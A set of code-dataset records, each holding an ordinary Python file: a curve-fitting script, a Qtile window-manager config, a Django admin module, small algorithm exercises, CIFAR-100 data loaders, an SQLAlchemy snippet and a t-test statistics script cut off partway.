np.cos((j - (12.5 + 25.))*np.pi/25.)\n        sin3[i,j] = np.cos((i - 25.)*np.pi/50.) * np.cos((j - (12.5 + 50.))*np.pi/25.)\n        sin4[i,j] = np.cos((i - 25.)*np.pi/50.) * np.cos((j - (12.5 + 75.))*np.pi/25.)\n\nsin1[:,25:100] = 0. \nsin2[:,:25] = 0.\nsin2[:,50:] = 0.\nsin3[:,:50] = 0. \nsin3[:,75:] = 0. \nsin4[:,:75] = 0. 
\n\nmask1 = np.zeros((50,100))\nmask2 = np.zeros((50,100))\nmask3 = np.zeros((50,100))\nmask4 = np.zeros((50,100))\nfor i in range(50):\n    for j in range(100):\n    \n        if sin1[i,j] != 0:\n            mask1[i,j] = 1.\n        if sin2[i,j] != 0.:\n            mask2[i,j] = 1.\n        if sin3[i,j] != 0.:\n            mask3[i,j] = 1.\n        if sin4[i,j] != 0.:\n            mask4[i,j] = 1.\n\nlayer_map = np.array([sin1,sin2,sin3,sin4])\n\n\n#Formula to modify to change curve\ncomparison = np.ones((50,100))\nindex_matrix = np.zeros((50,100,2))\n\nfor i in range(50):\n    for j in range(100):\n        index_matrix[i,j,0] = i\n        index_matrix[i,j,1] = j\n\na0_init, a1_init, a2_init, a3_init = 1.0, 1.0, 1.0, 1.0\ndef Correction(theta):\n\n    global diff_1, diff_2, diff_3, diff_4\n    global model, correction_model\n    a0, a1, a2, a3 = theta\n    correction1 = np.zeros((50,100))\n    correction2 = np.zeros((50,100))\n    correction3 = np.zeros((50,100))\n    correction4 = np.zeros((50,100))\n    # Scratch arrays for the alternative correction below; they were written to\n    # without ever being created, which raised a NameError, so initialise them here.\n    correction1_p1 = np.zeros((50,100))\n    correction_p2 = np.zeros((50,100))\n    for i in range(50):\n        for j in range(100):\n            # Corrections not based on map-generating formula\n            #\n\n            correction1_p1[i,j] = np.cos((i - 25.)*np.pi/50.)\n            correction_p2[i,j] = (1 - ((j - (12.5 + 50))*(np.pi/25.))**2/2 + ((j - (12.5 + 50.)*np.pi/25.)**4./24. - ((j - (12.5 + 50.))*np.pi/25.)**6./720.))\n            \n\n            correction1[i,j] = 1./(np.cos((i - 25.)*np.pi/50.) * (1 - ((j - 12.5)*(np.pi/25.))**2/2.))\n            correction2[i,j] = 1./(np.cos((i - 25.)*np.pi/50.) * (1 - ((j - (12.5 + 25.))*(np.pi*a1/25.)**2/2.)))\n            correction3[i,j] = 1./(np.cos((i - 25.)*np.pi/50.) * (1 - ((j - (12.5 + 50.))*(np.pi*a2/25.)**2/2.)))\n            correction4[i,j] = 1./(np.cos((i - 25.)*np.pi/50.) * (1 - ((j - (12.5 + 75.))*(np.pi*a3/25.)**2/2.)))\n\n    correction_model = np.array([correction1, correction2, correction3, correction4])\n    model = np.maximum((layer_map * correction_model)[0], (layer_map * correction_model)[1])\n    \n    Image1 = mask1 * model\n    Image2 = mask2 * model\n    Image3 = mask3 * model\n    Image4 = mask4 * model\n    \n    # Returns the sum of the first and second models, which is sin1, sin2 getting multiplied by the respective correction for each\n    # Why am I returning the sum of the absolute difference of the model and the comparison. The comparison is a matrix of ones. But it would need to be a two-layered matrix, not just one.\n    # Set the per-layer differences before returning; this assignment used to sit\n    # after the return statement and was never executed.\n    diff_1, diff_2, diff_3, diff_4 = np.abs(Image1 - sin1), np.abs(Image2 - sin2), np.abs(Image3 - sin3), np.abs(Image4 - sin4)\n    return np.sum((np.abs(Image1 - sin1) + np.abs(Image2 - sin2) + np.abs(Image3 - sin3) + np.abs(Image4 - sin4))**2)\n    \n    #return np.sum(np.abs(model - comparison))\n\nimport scipy.optimize as op\nresult = op.minimize(Correction, [a0_init, a1_init, a2_init, a3_init], options = {'maxiter' : 1000}, args=(), method='COBYLA')\nprint(result)\n\nImage1 = mask1 * model\nImage2 = mask2 * model\nImage3 = mask3 * model\nImage4 = mask4 * model\n\ndiff_1, diff_2, diff_3, diff_4 = np.sum(np.abs(Image1 - sin1)), np.sum(np.abs(Image2 - sin2)), np.sum(np.abs(Image3 - sin3)), np.sum(np.abs(Image4 - sin4))\n\n \na0, a1, a2, a3 = result[\"x\"][0], result[\"x\"][1], result[\"x\"][2], result[\"x\"][3]\n\nlevels = []\nfor i in range(100):\n    levels.append(0.03*i)\n\nx = list(range(100))\ny = list(range(50))\n\ncorrection1 = 1./(np.cos((index_matrix[:,:,0] - 25.)*np.pi/50.) * (1 - ((index_matrix[:,:,1] - 12.5)/(2*np.pi*a0/100))**2/2.))\ncorrection2 = 1./(np.cos((index_matrix[:,:,0] - 25.)*np.pi/50.) * (1 - ((index_matrix[:,:,1] - (12.5 + 25.))/(2*np.pi*a1/100))**2/2.))\ncorrection3 = 1./(np.cos((index_matrix[:,:,0] - 25.)*np.pi/50.) 
* (1 - ((index_matrix[:,:,1] - (12.5 + 50.))/(2*np.pi*a2/100))**2/2.))\ncorrection4 = 1./(np.cos((index_matrix[:,:,0] - 25.)*np.pi/50.) * (1 - ((index_matrix[:,:,1] - (12.5 + 75.))/(2*np.pi*a3/100))**2/2.))\n\ncorrection_model = np.array([correction1, correction2, correction3, correction4])\n\nplt.ion()\nplt.figure()\ncp = plt.contourf(x, y, Image1, cmap='hot', levels=levels)\nplt.show()\n\nImage1 = mask1 * model\nImage2 = mask2 * model\nImage3 = mask3 * model\nImage4 = mask4 * model\n\n#correction_model = np.array([correction1, correction2, correction3, correction4])\n#model = np.max(layer_model * correction_model, axis=0)\n\n\n\n\n\"\"\"\nimport difflib\n\nlines1 = []\nlines2 = []\n\nwith open('6:29.py', 'r') as f:\n\tfor line in f:\n\t\tlines1.append(line)\n\nwith open('6:24.py', 'r') as f:\n\tfor line in f:\n\t\tlines2.append(line)\n\nd = difflib.Differ()\ndiff = d.compare(lines1, lines2)\nprint '\\n'.join(diff)\n\n\nc0, c1, c2, c3 = theta\ncorrection = np.array(c0 - c1*(1 - mu_master) - c2*(1 - mu_master**2) - c3*(1 - mu_master**3))\n\nmodel = map_brightest * correction\nLight_Curve_Images = np.zeros((5,360,7100))\nLight_Curve_Values = np.zeros((5))\nfor i in range(5):\n\n Light_Curve_Images[i] = model * mu_mask_master[i]/(c0 - c1*(1 - mu_mask_master[i]) - c2*(1 - mu_mask_master[i]**2) - c3*(1 - mu_mask_master[i]**3))\n Light_Curve_Images[i] *= Cylindrical_to_Spherical_Conversion_list[i]\n Light_Curve_Values[i] = np.sum(Light_Curve_Images[i])\n\n\nMap_Totals = np.sum(np.sum(Map_Master_Spherical, axis=2), axis=1)\nMap_Totals *= np.sum(Light_Curve_Values)/np.sum(Map_Totals)\nLight_Curve_Diff = (Light_Curve_Values - Map_Totals)/np.sum(Light_Curve_Values)\nChi_Value = np.sum(Light_Curve_Diff**2)\"\"\"","sub_path":"7:7/7:10_3.py","file_name":"7:10_3.py","file_ext":"py","file_size_in_byte":5983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"247778738","text":"# Copyright (c) 2010 Aldo Cortesi\n# Copyright (c) 2010, 2014 dequis\n# Copyright (c) 2012 Randall Ma\n# Copyright (c) 2012-2014 Tycho Andersen\n# Copyright (c) 2012 Craig Barnes\n# Copyright (c) 2013 horsik\n# Copyright (c) 2013 Tao Sauvage\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\nfrom typing import List # noqa: F401\n\nfrom libqtile import bar, layout, widget, hook\nfrom libqtile.config import Click, Drag, Group, Key, Match, Screen\nfrom libqtile.lazy import lazy\nfrom libqtile.utils import guess_terminal\nimport os \nimport subprocess\n\ndef go_to_group(group):\n def f(qtile):\n if group in '12345':\n qtile.cmd_to_screen(0)\n qtile.groupMap[group].cmd_toscreen()\n else:\n qtile.cmd_to_screen(1)\n qtile.groupMap[group].cmd_toscreen()\n return f\n\n\nmod = \"mod4\"\nterminal = guess_terminal()\n\nkeys = [\n # Switch between windows\n Key([mod], \"h\", lazy.layout.left(), desc=\"Move focus to left\"),\n Key([mod], \"l\", lazy.layout.right(), desc=\"Move focus to right\"),\n Key([mod], \"j\", lazy.layout.down(), desc=\"Move focus down\"),\n Key([mod], \"k\", lazy.layout.up(), desc=\"Move focus up\"),\n Key([mod], \"space\", lazy.next_screen(), desc=\"Switch monitor keeb focus\"),\n\n # Move windows between left/right columns or move up/down in current stack.\n # Moving out of range in Columns layout will create new column.\n Key([mod, \"shift\"], \"h\", lazy.layout.shuffle_left(),\n desc=\"Move window to the left\"),\n Key([mod, \"shift\"], \"l\", lazy.layout.shuffle_right(),\n desc=\"Move window to the right\"),\n Key([mod, \"shift\"], \"j\", lazy.layout.shuffle_down(),\n desc=\"Move window down\"),\n Key([mod, \"shift\"], \"k\", lazy.layout.shuffle_up(), desc=\"Move window up\"),\n\n # Grow windows. If current window is on the edge of screen and direction\n # will be to screen edge - window would shrink.\n Key([mod, \"control\"], \"h\", lazy.layout.grow_left(),\n desc=\"Grow window to the left\"),\n Key([mod, \"control\"], \"l\", lazy.layout.grow_right(),\n desc=\"Grow window to the right\"),\n Key([mod, \"control\"], \"j\", lazy.layout.grow_down(),\n desc=\"Grow window down\"),\n Key([mod, \"control\"], \"k\", lazy.layout.grow_up(), desc=\"Grow window up\"),\n Key([mod], \"n\", lazy.layout.normalize(), desc=\"Reset all window sizes\"),\n Key([mod, \"shift\"], \"f\", lazy.window.toggle_fullscreen(), desc=\"Toggle fullscreen\"),\n\n # Toggle between split and unsplit sides of stack.\n # Split = all windows displayed\n # Unsplit = 1 window displayed, like Max layout, but still with\n # multiple stack panes\n Key([mod, \"shift\"], \"Return\", lazy.layout.toggle_split(),\n desc=\"Toggle between split and unsplit sides of stack\"),\n Key([mod], \"Return\", lazy.spawn(terminal), desc=\"Launch terminal\"),\n\n # Toggle between different layouts as defined below\n Key([mod], \"Tab\", lazy.next_layout(), desc=\"Toggle between layouts\"),\n Key([mod], \"w\", lazy.window.kill(), desc=\"Kill focused window\"),\n\n Key([mod, \"control\"], \"r\", lazy.restart(), desc=\"Restart Qtile\"),\n Key([mod, \"control\"], \"q\", lazy.shutdown(), desc=\"Shutdown Qtile\"),\n Key([mod], \"r\", lazy.spawncmd(),\n desc=\"Spawn a command using a prompt widget\"),\n\n\n # Opening programs:\n\n Key([mod], \"y\", lazy.spawn(\"dmenu_run -p 'Run: '\"),\n desc=\"Run launcher\"),\n \n Key([mod], \"e\", lazy.spawn(\"emacsclient -c -a 'emacs'\"),\n desc=\"Launch emacs\"),\n\n # Controlling volume:\n\n Key([\"shift\"], \"F1\", lazy.spawn('playerctl play-pause')),\n Key([\"shift\"], \"F2\", lazy.spawn('pamixer -d 2')),\n Key([\"shift\"], 
\"F3\", lazy.spawn('pamixer -i 2'))\n\n]\n\ngroups = [Group(i) for i in \"1234567890\"]\nfor i in groups:\n keys.extend([\n # mod1 + letter of group = switch to group\n Key([mod], i.name, lazy.group[i.name].toscreen(),\n desc=\"Switch to group {}\".format(i.name)),\n\n # mod1 + shift + letter of group = switch to & move focused window to group\n Key([mod, \"shift\"], i.name, lazy.window.togroup(i.name, switch_group=True),\n desc=\"Switch to & move focused window to group {}\".format(i.name)),\n # Or, use below if you prefer not to switch to that group.\n # # mod1 + shift + letter of group = move focused window to group\n # Key([mod, \"shift\"], i.name, lazy.window.togroup(i.name),\n # desc=\"move focused window to group {}\".format(i.name)),\n ])\n\nlayout_theme = {\"border_width\": 2,\n \"margin\": 6,\n \"border_focus\": \"#cc74cc\",\n \"border_normal\": \"#6c6c6c\"\n }\n\n\nlayouts = [\n layout.Columns(**layout_theme),\n layout.Max(**layout_theme),\n # Try more layouts by unleashing below layouts.\n # layout.Stack(num_stacks=2),\n layout.Bsp(**layout_theme),\n # layout.Matrix(),\n layout.MonadTall(**layout_theme),\n # layout.MonadWide(),\n # layout.RatioTile(),\n # layout.Tile(),\n # layout.TreeTab(),\n # layout.VerticalTile(),\n # layout.Zoomy(),\n]\n\ncolours = [[\"#2d2d2d\", \"#2d2d2d\"], #Panel background colour\n [\"#747369\", \"#747369\"], #Background for current screen tab\n [\"#d3d0c8\", \"#d3d0c8\"], #Font colour for group names\n [\"#52cdcd\", \"#52cdcd\"], #Border line colour for current tab\n [\"#5ece5e\", \"#5ece5e\"], #Border line colour for other tab + odd widgets\n [\"#cc74cc\", \"#cc74cc\"], #Colour for even widgets\n [\"#fec148\", \"#fec148\"], #Colour for window name\n [\"#d3d0c8\", \"#d3d0c8\"], #Light text colour for panel\n [\"#cc74cc\", \"#cc74cc\"], #Window border colour \n [\"#5ece5e\", \"#5ece5e\"]] #Green\n\nbright_colours = {'green': colours[9],\n 'pink': colours[8],\n 'yellow': colours[6],\n 'blue': colours[1],\n 'cyan': colours[2],\n 'red': ['#f55a5e', '#f55a5e']}\n\n\n\n\n\nwidget_defaults = dict(\n font='hack',\n fontsize=13,\n padding=2,\n background=colours[0]\n)\nextension_defaults = widget_defaults.copy()\n\nscreens = [\n Screen(wallpaper='~/pictures/w95.jpg', wallpaper_mode='fit',\n top=bar.Bar(\n [\n widget.GroupBox(active=colours[3], highlight_method='block'\n ),\n #widget.Prompt(),\n widget.Spacer(),\n widget.WindowName(foreground=colours[6], fontsize=16),\n widget.Clock(format='%a %d/%m, %I:%M %p', foreground=bright_colours['pink']),\n widget.Spacer(),\n widget.CurrentLayoutIcon()\n ],\n 24,\n ),\n ),\n\n Screen(wallpaper='~/pictures/w95.jpg', wallpaper_mode='fit',\n top=bar.Bar(\n [\n widget.GroupBox(active=colours[3], highlight_method='block'\n ),\n widget.CurrentLayoutIcon(foreground=bright_colours['pink']),\n #widget.Prompt(),\n widget.Spacer(),\n widget.WindowName(foreground=colours[6], fontsize=16),\n widget.Spacer(),\n widget.Clock(format='%d/%m/%Y %a %I:%M %p', foreground=colours[9]),\n widget.Spacer(),\n widget.CheckUpdates(distro=\"Arch_yay\", colour_have_updates=colours[8],\n colour_no_updates=colours[7], no_update_string=\"no updates\"),\n widget.QuickExit()\n ],\n 24,\n ),\n ),\n\n ]\n\n# Drag floating layouts.\nmouse = [\n Drag([mod], \"Button1\", lazy.window.set_position_floating(),\n start=lazy.window.get_position()),\n Drag([mod], \"Button3\", lazy.window.set_size_floating(),\n start=lazy.window.get_size()),\n Click([mod], \"Button2\", lazy.window.bring_to_front())\n]\n\ndgroups_key_binder = None\ndgroups_app_rules = [] # type: 
List\nmain = None # WARNING: this is deprecated and will be removed soon\nfollow_mouse_focus = True\nbring_front_click = False\ncursor_warp = False\nfloating_layout = layout.Floating(float_rules=[\n # Run the utility of `xprop` to see the wm class and name of an X client.\n *layout.Floating.default_float_rules,\n Match(wm_class='confirmreset'), # gitk\n Match(wm_class='makebranch'), # gitk\n Match(wm_class='maketag'), # gitk\n Match(wm_class='ssh-askpass'), # ssh-askpass\n Match(title='branchdialog'), # gitk\n Match(title='pinentry'), # GPG key password entry\n])\nauto_fullscreen = True\nfocus_on_window_activation = \"smart\"\n\n@hook.subscribe.startup_once\ndef start_once():\n home = os.path.expanduser('~')\n subprocess.run([home + '/.config/qtile/autostart.sh'])\n\n# XXX: Gasp! We're lying here. In fact, nobody really uses or cares about this\n# string besides java UI toolkits; you can see several discussions on the\n# mailing lists, GitHub issues, and other WM documentation that suggest setting\n# this string if your java app doesn't work correctly. We may as well just lie\n# and say that we're a working one by default.\n#\n# We choose LG3D to maximize irony: it is a 3D non-reparenting WM written in\n# java that happens to be on java's whitelist.\nwmname = \"LG3D\"\n","sub_path":"qtile/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":10035,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"429797096","text":"from django.contrib import admin\nfrom .models import NewsletterSubscriber, Message\n\n\nclass NewsletterSubscriberAdmin(admin.ModelAdmin):\n model = NewsletterSubscriber\n list_display = (\n \"email\",\n )\n\n\nclass MessageAdmin(admin.ModelAdmin):\n model = Message\n readonly_fields = (\n \"subject\",\n \"user_email\",\n \"message\",\n )\n\n\nadmin.site.register(NewsletterSubscriber,\n NewsletterSubscriberAdmin)\nadmin.site.register(Message, MessageAdmin)\n","sub_path":"homepage/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"368262405","text":"import sys\n\nq = lambda: sys.stdin.readline().strip()\nn = int(q())\nstack = []\n\nfor _ in range(n):\n\ttemp = q()\n\tif temp[:4]=='push':\n\t\tstack.append(int(temp[4:]))\n\t\n\telif temp=='pop':\n\t\tif len(stack)>0: print(stack.pop())\n\t\telse: print(-1)\n\t\n\telif temp=='top':\n\t\tif len(stack)>0: print(stack[-1])\n\t\telse: print(-1)\n\t\n\telif temp=='empty':\n\t\tif len(stack)==0: print(1)\n\t\telse: print(0)\n\t\n\telif temp=='size':\n\t\tprint(len(stack))\n","sub_path":"week-study/10828.py","file_name":"10828.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"394271778","text":"while True:\r\n try:\r\n cube = int(input(\"Enter an integer: \"))\r\n guess = 0\r\n\r\n while guess ** 3 < abs(cube):\r\n guess += 1\r\n if guess ** 3 != abs(cube):\r\n print(cube, \"is not a perfect cube\")\r\n break\r\n else:\r\n if cube < 0:\r\n guess = -guess\r\n print(\"Cube root of\", cube, \"is:\", guess)\r\n break \r\n except ValueError:\r\n print(\"You have not entered an integer\")\r\n","sub_path":"basic_algorithms/guess_and_check_cube_root.py","file_name":"guess_and_check_cube_root.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} 
+{"seq_id":"234278100","text":"from torch.utils import data\nimport torchvision.transforms as transforms\nimport os\nimport torchvision\n\nimport glob\n\nCIFAR100_TRAIN_MEAN = [0.5070751592371323, 0.48654887331495095, 0.4409178433670343]\nCIFAR100_TRAIN_STD = [0.2673342858792401, 0.2564384629170883, 0.27615047132568404]\n\nCIFAR100_TEST_MEAN = [0.5088964127604166, 0.48739301317401956, 0.44194221124387256]\nCIFAR100_TEST_STD = [0.2682515741720801, 0.2573637364478126, 0.2770957707973042]\n\ndef get_train_loader(args, dataset_class, use_sobel=False, use_color=False):\n # Data loading code\n normalize = transforms.Normalize(mean=CIFAR100_TRAIN_MEAN,\n std=CIFAR100_TRAIN_STD)\n img_transform = transforms.Compose([\n transforms.RandomCrop(32, padding=4),\n transforms.RandomHorizontalFlip(),\n transforms.RandomRotation(15),\n transforms.ToTensor(),\n normalize,\n ])\n\n dataset = dataset_class(f'{args.img_dir}/train', transform=img_transform, use_sobel=use_sobel, use_color=use_color)\n # dataset = torchvision.datasets.CIFAR100(root='/home/work/Datasets/CIFAR100', train=True, download=True, transform=img_transform)\n\n train_dataloader = data.DataLoader(dataset, num_workers=args.n_workers, batch_size=args.batch_size, shuffle=True,\n drop_last=True)\n\n return train_dataloader\n\ndef get_val_loader(args, dataset_class):\n # Data loading code\n normalize = transforms.Normalize(mean=CIFAR100_TRAIN_MEAN,\n std=CIFAR100_TRAIN_STD)\n img_transform = transforms.Compose([\n transforms.ToTensor(),\n normalize,\n ])\n\n dataset = dataset_class(f'{args.img_dir}/test', transform=img_transform)\n # dataset = torchvision.datasets.CIFAR100(root='/home/work/Datasets/CIFAR100', train=False, download=True, transform=img_transform)\n\n train_dataloader = data.DataLoader(dataset, num_workers=args.n_workers, batch_size=args.batch_size, shuffle=True,\n drop_last=True)\n\n return train_dataloader\n\n","sub_path":"CIFAR100/data/data_manager.py","file_name":"data_manager.py","file_ext":"py","file_size_in_byte":2066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"230399549","text":"from sqlalchemy import Table, Column, MetaData, String\nfrom sqlalchemy import create_engine\n\nmeta = MetaData()\n\nengine = create_engine('mysql://root:rachel@localhost/test?charset=utf8')\n\nmeta.bind = engine\n\nusers = Table('users', meta, autoload=True)\nphone = Column('phone', String(50))\n\n# I think this method is wrapped by sqlalchemy-migrate\nusers.create_column(phone)\n","sub_path":"sqlalchemy/add_column.py","file_name":"add_column.py","file_ext":"py","file_size_in_byte":371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"8338305","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\n'''Module used to calculate t-student statistics of experiments.\n'''\n\nimport collections\nimport itertools\nimport json\nimport math\nimport os\nimport statistics\nimport sys\n\nfrom scipy.stats import t as student_t\n\n\nColumnIndices = collections.namedtuple('ColumnIndices',\n ['dataset_col',\n 'attribute_col',\n 'num_values_col',\n 'criterion_col',\n 'trial_number_col',\n 'fold_number_col',\n 'accuracy_w_missing_col',\n 'accuracy_wo_missing_col',\n 'num_nodes_col'])\n\n#: Contain the column indices for a rank experiment\nRANK_COLUMN_INDICES = ColumnIndices(dataset_col=1,\n attribute_col=3,\n num_values_col=5,\n criterion_col=8,\n trial_number_col=7,\n fold_number_col=11,\n accuracy_w_missing_col=29,\n accuracy_wo_missing_col=30,\n 
num_nodes_col=33)\n\n#: Contain the column indices for a cross-validation experiment\nCROSS_VALIDATION_COLUMN_INDICES = ColumnIndices(dataset_col=1,\n attribute_col=None,\n num_values_col=None,\n criterion_col=4,\n trial_number_col=3,\n fold_number_col=None,\n accuracy_w_missing_col=20,\n accuracy_wo_missing_col=21,\n num_nodes_col=28)\n\n#: Contain the column indices for a train-and-test experiment\nTRAIN_AND_TEST_COLUMN_INDICES = ColumnIndices(dataset_col=1,\n attribute_col=None,\n num_values_col=None,\n criterion_col=7,\n trial_number_col=5,\n fold_number_col=None,\n accuracy_w_missing_col=20,\n accuracy_wo_missing_col=21,\n num_nodes_col=24)\n\n\ndef main(output_path):\n '''Calculates the t-student statistics of experiments contained in this folder.\n\n The `output_path` folder must contain the `raw_output.csv` file and the `experiment_config.json`\n file, otherwise the function will exit.\n '''\n raw_output_path = os.path.join(output_path, 'raw_output.csv')\n if (not os.path.exists(raw_output_path)\n or not os.path.isfile(raw_output_path)):\n print('This path does not contain the output of an experiment.')\n sys.exit(1)\n\n experiment_config_filepath = os.path.join(output_path, 'experiment_config.json')\n if (not os.path.exists(experiment_config_filepath)\n or not os.path.isfile(experiment_config_filepath)):\n print('This path does not contain the output of an experiment.')\n sys.exit(1)\n with open(experiment_config_filepath, 'r') as experiment_config_json:\n experiment_config = json.load(experiment_config_json)\n if \"min num values to compare\" in experiment_config:\n min_num_values_to_compare = experiment_config[\"min num values to compare\"]\n else:\n min_num_values_to_compare = 2\n\n if experiment_config[\"rank attributes\"]:\n is_rank = True\n column_indices = RANK_COLUMN_INDICES\n elif experiment_config[\"use cross-validation\"]:\n is_rank = False\n column_indices = CROSS_VALIDATION_COLUMN_INDICES\n else:\n is_rank = False\n column_indices = TRAIN_AND_TEST_COLUMN_INDICES\n\n single_sided_p_value_threshold = experiment_config[\"t-test single-sided p-value\"]\n\n raw_data = _load_raw_data(raw_output_path, column_indices, is_rank, min_num_values_to_compare)\n _save_raw_stats(raw_data, output_path, is_rank)\n _save_aggreg_stats(output_path, single_sided_p_value_threshold)\n\n\ndef _load_raw_data(raw_output_path, column_indices, is_rank, min_num_values_to_compare=2):\n def _init_raw_data():\n # This function creates (in a lazy way) an infinitely-nested default dict. 
This is\n # useful when creating a default dict highly nested.\n return collections.defaultdict(_init_raw_data)\n\n raw_data = _init_raw_data()\n has_read_header = False\n with open(raw_output_path, 'r') as fin:\n for line in fin:\n if not has_read_header:\n has_read_header = True\n continue\n line_list = line.split(',')\n\n dataset_name = line_list[column_indices.dataset_col]\n criterion_name = line_list[column_indices.criterion_col]\n trial_number = line_list[column_indices.trial_number_col]\n\n accuracy_w_missing = float(line_list[column_indices.accuracy_w_missing_col])\n try:\n accuracy_wo_missing = float(line_list[column_indices.accuracy_wo_missing_col])\n except ValueError:\n accuracy_wo_missing = None\n num_nodes = float(line_list[column_indices.num_nodes_col])\n\n if is_rank:\n try:\n num_values = int(line_list[column_indices.num_values_col])\n if num_values < min_num_values_to_compare:\n continue\n except ValueError:\n # Numeric attribute\n if min_num_values_to_compare > 2:\n # In this case we assume we are only interested in nominal attributes.\n continue\n attribute_name = line_list[column_indices.attribute_col]\n fold_number = line_list[column_indices.fold_number_col]\n raw_data[dataset_name][attribute_name][criterion_name][trial_number][\n fold_number] = (accuracy_w_missing,\n accuracy_wo_missing,\n num_nodes)\n else:\n raw_data[dataset_name][criterion_name][trial_number] = (accuracy_w_missing,\n accuracy_wo_missing,\n num_nodes)\n return raw_data\n\n\ndef _save_raw_stats(raw_data, output_path, is_rank):\n raw_stats_output_file = os.path.join(output_path, 'raw_t_student_stats.csv')\n with open(raw_stats_output_file, 'w') as fout:\n header = ['Dataset',\n 'Attribute',\n 'Criterion Difference Name',\n 'Paired t-statistics on Accuracy with Missing Values',\n 'Degrees of Freedom of Accuracy with Missing Values',\n 'P-value t-statistics on Accuracy with Missing Values',\n 'Paired t-statistics on Accuracy without Missing Values',\n 'Degrees of Freedom of Accuracy without Missing Values',\n 'P-value t-statistics on Accuracy without Missing Values',\n 'Paired t-statistics on Number of Nodes',\n 'Degrees of Freedom of Number of Nodes',\n 'P-value t-statistics on Number of Nodes']\n print(','.join(header), file=fout)\n if is_rank:\n for dataset_name in raw_data:\n for attribute_name in raw_data[dataset_name]:\n for (criterion_name_1,\n criterion_name_2) in itertools.combinations(\n raw_data[dataset_name][attribute_name], 2):\n\n\n criterion_diff_name = ' - '.join((criterion_name_1, criterion_name_2))\n accuracy_w_missing_diff = []\n accuracy_wo_missing_diff = []\n num_nodes_diff = []\n\n trial_number_intersection = (\n set(raw_data[dataset_name][attribute_name][criterion_name_1].keys())\n & set(raw_data[dataset_name][attribute_name][criterion_name_2].keys()))\n for trial_number in trial_number_intersection:\n fold_number_intersection = (\n set(raw_data[dataset_name][attribute_name][criterion_name_1][\n trial_number].keys())\n & set(raw_data[dataset_name][attribute_name][criterion_name_2][\n trial_number].keys()))\n for fold_number in fold_number_intersection:\n criterion_1_data = raw_data[dataset_name][attribute_name][\n criterion_name_1][trial_number][fold_number]\n criterion_2_data = raw_data[dataset_name][attribute_name][\n criterion_name_2][trial_number][fold_number]\n\n accuracy_w_missing_diff.append(\n criterion_1_data[0] - criterion_2_data[0])\n if (criterion_1_data[1] is not None\n and criterion_2_data[1] is not None):\n accuracy_wo_missing_diff.append(\n criterion_1_data[1] - 
criterion_2_data[1])\n num_nodes_diff.append(\n criterion_1_data[2] - criterion_2_data[2])\n\n (t_statistic_w_missing,\n p_value_w_missing) = _calculate_t_statistic(accuracy_w_missing_diff)\n (t_statistic_wo_missing,\n p_value_wo_missing) = _calculate_t_statistic(accuracy_wo_missing_diff)\n (t_statistic_num_nodes,\n p_value_num_nodes) = _calculate_t_statistic(num_nodes_diff)\n print(','.join([dataset_name,\n attribute_name,\n criterion_diff_name,\n str(t_statistic_w_missing),\n str(len(accuracy_w_missing_diff) - 1),\n str(p_value_w_missing),\n str(t_statistic_wo_missing),\n str(len(accuracy_wo_missing_diff) - 1),\n str(p_value_wo_missing),\n str(t_statistic_num_nodes),\n str(len(num_nodes_diff) - 1),\n str(p_value_num_nodes)]),\n file=fout)\n else:\n for dataset_name in raw_data:\n for (criterion_name_1,\n criterion_name_2) in itertools.combinations(raw_data[dataset_name], 2):\n\n criterion_diff_name = ' - '.join((criterion_name_1, criterion_name_2))\n accuracy_w_missing_diff = []\n accuracy_wo_missing_diff = []\n num_nodes_diff = []\n\n trial_number_intersection = (\n set(raw_data[dataset_name][criterion_name_1].keys())\n & set(raw_data[dataset_name][criterion_name_2].keys()))\n for trial_number in trial_number_intersection:\n criterion_1_data = raw_data[dataset_name][criterion_name_1][trial_number]\n criterion_2_data = raw_data[dataset_name][criterion_name_2][trial_number]\n\n accuracy_w_missing_diff.append(\n criterion_1_data[0] - criterion_2_data[0])\n if (criterion_1_data[1] is not None\n and criterion_2_data[1] is not None):\n accuracy_wo_missing_diff.append(\n criterion_1_data[1] - criterion_2_data[1])\n num_nodes_diff.append(\n criterion_1_data[2] - criterion_2_data[2])\n\n (t_statistic_w_missing,\n p_value_w_missing) = _calculate_t_statistic(accuracy_w_missing_diff)\n (t_statistic_wo_missing,\n p_value_wo_missing) = _calculate_t_statistic(accuracy_wo_missing_diff)\n (t_statistic_num_nodes,\n p_value_num_nodes) = _calculate_t_statistic(num_nodes_diff)\n print(','.join([dataset_name,\n str(None),\n criterion_diff_name,\n str(t_statistic_w_missing),\n str(len(accuracy_w_missing_diff) - 1),\n str(p_value_w_missing),\n str(t_statistic_wo_missing),\n str(len(accuracy_wo_missing_diff) - 1),\n str(p_value_wo_missing),\n str(t_statistic_num_nodes),\n str(len(num_nodes_diff) - 1),\n str(p_value_num_nodes)]),\n 